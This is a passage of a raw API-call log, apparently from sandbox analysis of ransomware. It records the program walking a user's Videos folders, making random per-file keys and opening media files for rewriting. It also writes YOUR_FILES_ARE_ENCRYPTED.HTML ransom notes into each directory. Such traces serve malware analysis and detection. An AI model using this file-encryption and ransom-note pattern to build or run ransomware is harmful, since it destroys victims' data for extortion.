lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.855] PathFindExtensionW (pszPath="xa_lhgCiG.avi") returned=".avi" [0168.855] lstrlenW (lpString=".avi") returned 4 [0168.855] PathFindExtensionW (pszPath="xa_lhgCiG.avi") returned=".avi" [0168.855] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\xa_lhgcig.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0168.855] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=53374) returned 1 [0168.855] GetProcessHeap () returned 0x270000 [0168.855] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0168.859] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="AB") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="56") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="1E") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="BB") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="34") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="4A") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="FD") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="7B") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="B9") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="8F") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="64") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="79") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="FA") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="3C") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="8C") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="04") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="BE") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="57") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="48") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BF") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="64") returned 2 [0168.859] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="BE") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="4D") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CD") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="4B") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="A5") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="82") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="6C") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="C5") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="57") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="83") returned 2 [0168.860] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="27") returned 2 [0168.860] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi" [0168.860] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.860] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0168.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b0ad170, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0x7b2c7030, ftLastAccessTime.dwHighDateTime=0x1d7d842, ftLastWriteTime.dwLowDateTime=0x7b2c7030, ftLastWriteTime.dwHighDateTime=0x1d7d842, nFileSizeHigh=0x0, nFileSizeLow=0x1741e, dwReserved0=0x0, dwReserved1=0x60, cFileName="XM0Taz9.mkv", cAlternateFileName="")) returned 1 [0168.861] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\XM0Taz9.mkv") returned 87 [0168.861] lstrcmpW (lpString1="XM0Taz9.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.861] PathFindExtensionW (pszPath="XM0Taz9.mkv") returned=".mkv" [0168.861] lstrlenW (lpString=".mkv") returned 4 [0168.861] PathFindExtensionW (pszPath="XM0Taz9.mkv") returned=".mkv" [0168.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b0ad170, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0x7b2c7030, ftLastAccessTime.dwHighDateTime=0x1d7d842, ftLastWriteTime.dwLowDateTime=0x7b2c7030, ftLastWriteTime.dwHighDateTime=0x1d7d842, nFileSizeHigh=0x0, nFileSizeLow=0x1741e, dwReserved0=0x0, dwReserved1=0x60, cFileName="XM0Taz9.mkv", cAlternateFileName="")) returned 0 [0168.861] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.861] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0168.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.862] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.864] CloseHandle (hObject=0x4a8) returned 1 [0168.864] GetProcessHeap () returned 0x270000 [0168.865] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ab480 | out: hHeap=0x270000) returned 1 [0168.865] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="y0DAHsSstBIa", cAlternateFileName="Y0DAHS~1")) returned 0 [0168.865] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.865] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0168.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.865] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.867] CloseHandle (hObject=0x5e4) returned 1 [0168.868] GetProcessHeap () returned 0x270000 [0168.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0168.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="ff3aNZOdEdDnbufSZH", cAlternateFileName="FF3ANZ~1")) returned 0 [0168.868] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.868] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0168.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0168.869] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.871] CloseHandle (hObject=0x5ac) returned 1 [0168.871] GetProcessHeap () returned 0x270000 [0168.872] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.872] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.872] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\desktop.ini") returned 42 [0168.872] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.872] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.872] lstrlenW (lpString=".ini") returned 4 [0168.872] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.872] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cb23d0, ftCreationTime.dwHighDateTime=0x1d7d92d, ftLastAccessTime.dwLowDateTime=0x6c3c8e10, ftLastAccessTime.dwHighDateTime=0x1d7e0d6, ftLastWriteTime.dwLowDateTime=0x6c3c8e10, ftLastWriteTime.dwHighDateTime=0x1d7e0d6, nFileSizeHigh=0x0, nFileSizeLow=0xa4a0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="fN8HPB62F.flv", cAlternateFileName="FN8HPB~1.FLV")) returned 1 [0168.872] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv") returned 44 [0168.872] lstrcmpW (lpString1="fN8HPB62F.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.872] PathFindExtensionW (pszPath="fN8HPB62F.flv") returned=".flv" [0168.872] lstrlenW (lpString=".flv") returned 4 [0168.872] PathFindExtensionW (pszPath="fN8HPB62F.flv") returned=".flv" [0168.872] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\fn8hpb62f.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0168.873] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=42144) returned 1 [0168.873] GetProcessHeap () returned 0x270000 [0168.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0168.876] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="92") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="94") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E5") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B1") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="87") returned 2 [0168.876] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="85") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="8D") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="87") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="56") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C3") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="76") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="28") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C0") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="FC") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="E7") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="6F") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="38") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="B3") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D8") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="FB") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D3") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="76") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="41") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="E4") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="9F") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2B") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="01") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="75") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="81") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="4B") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="1A") returned 2 [0168.877] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="16") returned 2 [0168.878] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv" [0168.878] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.878] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0168.878] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="GaX8iFuHaRl", cAlternateFileName="GAX8IF~1")) returned 1 [0168.878] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl") returned 42 [0168.878] GetProcessHeap () returned 0x270000 [0168.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.878] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl" [0168.878] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*" [0168.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.879] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25450, ftCreationTime.dwHighDateTime=0x1d7e61c, ftLastAccessTime.dwLowDateTime=0xcf4e4c90, ftLastAccessTime.dwHighDateTime=0x1d7e73f, ftLastWriteTime.dwLowDateTime=0xcf4e4c90, ftLastWriteTime.dwHighDateTime=0x1d7e73f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.879] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56dcd1a0, ftCreationTime.dwHighDateTime=0x1d7e4d8, ftLastAccessTime.dwLowDateTime=0x597bcc20, ftLastAccessTime.dwHighDateTime=0x1d7e5ac, ftLastWriteTime.dwLowDateTime=0x597bcc20, ftLastWriteTime.dwHighDateTime=0x1d7e5ac, nFileSizeHigh=0x0, nFileSizeLow=0xedf9, dwReserved0=0xfe7a6e88, dwReserved1=0xffffffff, cFileName="dfCFe1F6XdsX.avi", cAlternateFileName="DFCFE1~1.AVI")) returned 1 [0168.879] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi") returned 59 [0168.879] lstrcmpW (lpString1="dfCFe1F6XdsX.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.879] PathFindExtensionW (pszPath="dfCFe1F6XdsX.avi") returned=".avi" [0168.879] lstrlenW (lpString=".avi") returned 4 [0168.879] PathFindExtensionW (pszPath="dfCFe1F6XdsX.avi") returned=".avi" [0168.879] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\gax8ifuharl\\dfcfe1f6xdsx.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0168.879] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=60921) returned 1 [0168.879] GetProcessHeap () returned 0x270000 [0168.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76091a8 [0168.883] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="29") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="88") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5B") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="28") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F9") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="72") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="46") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5A") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7F") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1D") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="59") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="27") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="10") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2A") returned 2 [0168.883] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FA") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B4") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7E") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F1") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7D") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8A") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="98") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3E") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="93") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A4") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="19") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="9F") returned 2 [0168.884] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7E") returned 2 [0168.884] lstrcpyW (in: lpString1=0x761925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi" [0168.884] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x76091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.885] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76091a8, lpOverlapped=0x76091a8) returned 1 [0168.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f4f50, 